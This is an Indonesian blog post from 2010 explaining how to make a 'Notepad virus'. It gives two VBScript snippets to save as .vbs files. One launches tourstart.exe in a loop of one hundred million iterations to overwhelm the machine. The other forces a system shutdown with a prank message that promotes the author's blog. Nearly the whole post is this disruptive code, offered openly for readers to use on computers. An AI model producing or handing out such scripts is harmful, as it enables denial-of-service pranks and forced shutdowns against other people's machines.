Rabu, 03 November 2010

Cara Membuat VIRUS NOTEPAD dengan mudah


masih ada virus notepad lain yang dapat dibuat...
ni dia :

- seperti biasa buka notepad dan copy script berikut :

    
    
option explicit

dim wshshell
set wshshell=wscript.createobject("wscript.shell")

dim x
for x = 1 to 100000000
wshshell.run "tourstart.exe"
next



atau bisa juga yang ini.....

option explicit

dim wshshell
set wshshell=wscript.createobject("wscript.shell")

dim x
for x = 1 to 1
wshshell.run "shutdown -s -c Maaf Komputer akan shut down!!!! MkZhacker.blogspot.com "
next


- setelah itu simpan file tsb dengan nama akhiran .vbs

Tidak ada komentar:

Posting Komentar